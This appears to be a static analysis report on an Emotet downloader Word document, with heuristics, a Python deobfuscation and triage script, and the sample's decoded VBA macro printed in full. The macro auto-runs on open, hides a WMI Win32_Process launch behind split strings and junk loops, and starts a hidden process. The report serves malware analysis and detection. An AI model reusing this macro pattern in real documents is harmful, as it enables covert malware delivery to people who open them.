Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 1dadd763f1ed5132…

MALICIOUS

Office (OLE)

Size: 135.8 KB · Created: 2019-05-06 13:37:00 · Authoring application: Microsoft Office Word · First seen: 2019-05-16
MD5: e3cb8bcb7ca4fccf68e0b80722902986
SHA-1: 706713951d2a03c78d00bba5928cc7dd206653ab
SHA-256: 1dadd763f1ed5132de6c4bb9963d4e58e7054c56f232b8dfdd3d6853294861e5
Risk Score: 242

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic · T1204.002 User Execution: Malicious File · T1105 Ingress Tool Transfer

ClamAV identifies the sample with an Emotet-specific signature (Doc.Downloader.Emotet-6963215-0). The critical heuristic is a VBA execution chain: the macro calls GetObject on a WMI moniker assembled from split string literals ("win" + "mgmt" + "s:Wi" + "n32_Pr" + "ocess", i.e. winmgmts:Win32_Process), then invokes .Create on the result, passing a Win32_ProcessStartup object whose ShowWindow is set to 0 (vbError - vbError, summed), so the launched command runs with a hidden window. Only GetObject is used; there is no CreateObject call in the recovered source. The command line itself is concatenated at run time from UserForm control properties and members (j6__0708.P96426_.PasswordChar, j6__0708.P96426_.ControlSource, n596_952.h95_210, ...), so it is not visible in the decoded VBA and the downloaded payload cannot be named from the macro text alone; the ClamAV classification and T1105 reflect the downloader behaviour. The code is padded with empty While/Wend loops on uninitialised variables that never execute. A Sub autoopen procedure triggers the chain as soon as the document is opened with macros enabled.

Heuristics (7)

  • ClamAV: Doc.Downloader.Emotet-6963215-0 [critical · CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6963215-0
  • VBA macros detected [medium · OLE_VBA_MACROS · 3 related findings]
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher [critical · OLE_VBA_WMI_PROCESS_CREATE]
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions. In this sample the moniker is split across line continuations as "win" + "mgmt" + "s:Wi" + "n32_Pr" + "ocess", wrapped in the helper o1845290 (a CVar pass-through), and .Create is called on the result in D982896_.
  • AutoOpen macro [high · OLE_VBA_AUTOOPEN]
    Sub autoopen() is present and calls D982896_, so the chain runs on document open.
  • GetObject call [high · OLE_VBA_GETOBJ]
    GetObject is called twice, for the Win32_Process and Win32_ProcessStartup monikers.
  • Legacy WordBasic auto-exec macro marker [medium · OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this is the rule's generic description: for this sample a VBA project was recovered (macros.bas below, including Sub autoopen), so the marker is redundant with OLE_VBA_AUTOOPEN here.
  • Embedded URL [info · EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard OOXML DrawingML namespace URI found in any document with drawing content; it is not a network indicator and should not be treated as a download or C2 URL.
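As an added example, not part of this report or of the oletools output it quotes, the following Python undoes the three cheap obfuscations visible in the extracted macro (line continuations, empty While/Wend padding and split string literals), reconstructs the WMI monikers, and maps the result onto the heuristic IDs used above. SAMPLE_VBA is a constructed excerpt modelled on macros.bas below (identifiers and the split moniker copied from it, most of the padding omitted); the regular expressions and the triage() mapping are this example's own logic, not the analysis platform's.

```python
import re

# Constructed excerpt modelled on the macros.bas extracted from this sample.
# Identifiers and the split "winmgmts:" moniker are copied from it; most of
# the While/Wend padding is omitted. Not the full macro.
SAMPLE_VBA = r'''Sub _
autoopen()
On Error Resume Next
         While K1194093 And 118413774
      Wend
Call D982896_
End Sub

Function D982896_()
On Error Resume Next
         While j075205 And 751277254
      Wend
Set K2302_ = o1845290(GetObject("win" + _
"mgmt" + "s:Wi" + "n32_Pr" _
+ "ocess"))
K2302_.Create Q83009 + Q4_8041_ + B8617_, i8360537, d3733_, j6078588
End Function

Public Function d3733_()
Set d3733_ = o1845290(GetObject("win" _
+ "mgmt" + "s:Wi" _
+ "n32_Pr" + "ocess" + "S" _
+ "tartup"))
L90149 = vbError - vbError
With d3733_
. _
ShowWindow = L90149 + L90149 + L90149
End With
End Function
'''

# "<space>_<newline>" is the VBA line continuation.
CONTINUATION = re.compile(r'[ \t]_[ \t]*\r?\n[ \t]*')
# "While <ident> And <int>" / "Wend" with an empty body: the variable is an
# uninitialised Variant (Empty), so the condition is False and the loop never
# runs; it only pads the code.
JUNK_LOOP = re.compile(
    r'^[ \t]*While[ \t]+\w+[ \t]+And[ \t]+\d+[ \t]*\r?\n[ \t]*Wend[ \t]*\r?\n', re.M)
# Two adjacent string literals joined with + or & (VBA "" escapes are not handled).
LITERAL_CONCAT = re.compile(r'"([^"\n]*)"[ \t]*[+&][ \t]*"([^"\n]*)"')
# ". _<newline>Member" survives continuation joining as ". Member".
DOT_SPACE = re.compile(r'\.[ \t]+(?=[A-Za-z_])')

WMI_MONIKER = re.compile(r'GetObject\(\s*"(winmgmts:[^"]*)"', re.I)
GETOBJECT = re.compile(r'\bGetObject\s*\(', re.I)
AUTOEXEC = re.compile(
    r'^[ \t]*(?:Public[ \t]+|Private[ \t]+)?Sub[ \t]+'
    r'(autoopen|auto_open|document_open|autoexec|workbook_open)\b', re.I | re.M)
PROCESS_CREATE = re.compile(r'\.Create\b', re.I)
SHOWWINDOW = re.compile(r'\.ShowWindow\s*=', re.I)


def normalize_vba(src):
    """Undo the obfuscations above; return (normalised source, junk loops removed)."""
    text = CONTINUATION.sub(' ', src)
    text, junk = JUNK_LOOP.subn('', text)
    text = DOT_SPACE.sub('.', text)
    while True:  # fold "a" + "b" + "c" left to right until nothing changes
        text, n = LITERAL_CONCAT.subn(r'"\g<1>\g<2>"', text)
        if not n:
            break
    return text, junk


def heuristic_ids(findings):
    """Map findings onto the heuristic IDs used in the report above."""
    ids = []
    if findings['autoexec']:
        ids.append('OLE_VBA_AUTOOPEN')
    if findings['getobject']:
        ids.append('OLE_VBA_GETOBJ')
    if findings['win32_process_create']:
        ids.append('OLE_VBA_WMI_PROCESS_CREATE')
    return ids


def triage(src):
    """Normalise the VBA and report the WMI launcher chain indicators."""
    text, junk = normalize_vba(src)
    monikers = WMI_MONIKER.findall(text)
    lowered = [m.lower() for m in monikers]
    findings = {
        'junk_loops_removed': junk,
        'autoexec': [m.lower() for m in AUTOEXEC.findall(text)],
        'getobject': bool(GETOBJECT.search(text)),
        'wmi_monikers': monikers,
        # Process-class moniker plus a .Create call: the launcher chain.
        'win32_process_create': 'winmgmts:win32_process' in lowered
                                and bool(PROCESS_CREATE.search(text)),
        # Win32_ProcessStartup with ShowWindow assigned; in the sample the value
        # is vbError - vbError summed, i.e. 0 (SW_HIDE): the command runs hidden.
        'startup_showwindow': 'winmgmts:win32_processstartup' in lowered
                              and bool(SHOWWINDOW.search(text)),
    }
    findings['heuristics'] = heuristic_ids(findings)
    return findings


if __name__ == '__main__':
    print(normalize_vba(SAMPLE_VBA)[0])
    for key, value in triage(SAMPLE_VBA).items():
        print(f'{key}: {value}')
```

Running it prints the normalised source with GetObject("winmgmts:Win32_Process") and GetObject("winmgmts:Win32_ProcessStartup") spelled out, which is the pattern OLE_VBA_WMI_PROCESS_CREATE keys on. What this cannot recover is the command passed to .Create: that string is concatenated at run time from UserForm control properties and members (j6__0708.P96426_.PasswordChar, n596_952.h95_210, ...), which live in the form's storage streams rather than in the VBA source, so the decoded macro alone does not show what is downloaded or run.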

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas · vba-macro · oletools.olevba.extract_macros (decoded VBA source) · 3777 bytes
SHA-256: ab119dfcbb4ea9f0e5c6b47ce062585e341a372c9396d515ef444fb1ebca935d
Extracted script (decoded VBA source of macros.bas):
Attribute VB_Name = "Z856963"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "j6__0708"
Attribute VB_Base = "0{C65F613D-F1EE-4F9A-915B-4785CAEEBC73}{7657BC4F-E26B-4FC5-BCB2-7C99649C69DE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "F27776"

Attribute VB_Name = "t280281"

Attribute VB_Name = "o78_141"

Attribute VB_Name = "n596_952"
Attribute VB_Base = "0{EBB0C2DF-00E7-454E-A202-949F076578BB}{10C2318E-9A09-49F9-B63F-0046742D012B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "H647502_"
Function o1845290(w384214)
         While V996_593 And 356701372
      Wend
         While J79437 And 100206966
      Wend
Set o1845290 = CVar(w384214)
         While H453_79 And 783194112
      Wend
         While B10103 And 623024061
      Wend
End Function
Sub _
autoopen()
On Error Resume Next
         While K1194093 And 118413774
      Wend
         While d087_324 And 868337191
      Wend
Call D982896_
         While i787291 And 270918215
      Wend
         While A52092 And 123278912
      Wend
         While T3708425 And 543443893
      Wend
End Sub


Attribute VB_Name = "k864157"
Function D982896_()
On Error Resume Next
         While j075205 And 751277254
      Wend
         While t130__18 And 501459720
      Wend
         While v674033 And 941319169
      Wend
Q4_8041_ = j6__0708.P96426_.PasswordChar + n596_952.h95_210 + j6__0708.P96426_.ControlSource + n596_952.S668539 + j6__0708.P96426_ + j6__0708.P96426_.PasswordChar + n596_952.E769331_ + j6__0708.P96426_ + j6__0708.P96426_ + n596_952.A20201 + j6__0708.P96426_.ControlSource + n596_952.h65870 + j6__0708.P96426_.ControlSource
         While i9_28181 And 257383291
      Wend
         While a64598_ And 54261969
      Wend
Set K2302_ = o1845290(GetObject("win" + _
"mgmt" + "s:Wi" + "n32_Pr" _
+ "ocess"))
         While J61845 And 996734424
      Wend
         While o50543 And 9845112
      Wend
         While L7_4_85 And 195162931
      Wend
K2302_.Create Q83009 + Q4_8041_ + B8617_, i8360537, d3733_, j6078588
         While d8925_8 And 743433576
      Wend
         While R_7741 And 64425475
      Wend
End Function


Attribute VB_Name = "h12189"

Public Function d3733_()
         While F53778 And 702902986
      Wend
         While J6043977 And 230351976
      Wend
Set d3733_ = o1845290(GetObject("win" _
+ "mgmt" + "s:Wi" _
+ "n32_Pr" + "ocess" + "S" _
+ "tartup"))
         While N4398_ And 216373571
      Wend
         While j08737 And 373364026
      Wend
L90149 = vbError - vbError
         While s_52088 And 976131167
      Wend
         While d9622526 And 234475133
      Wend
         While p48786 And 919274493
      Wend
With d3733_
         While j683522 And 902427850
      Wend
         While H590023 And 770700491
      Wend
         While M009_39 And 229586958
      Wend
. _
ShowWindow = L90149 + L90149 + L90149 + L90149 + L90149 + L90149 + L90149
         While E9522294 And 524033723
      Wend
         While i9389585 And 5853147
      Wend
End With
         While z195_8 And 562694830
      Wend
         While H31237 And 511724706
      Wend
End Function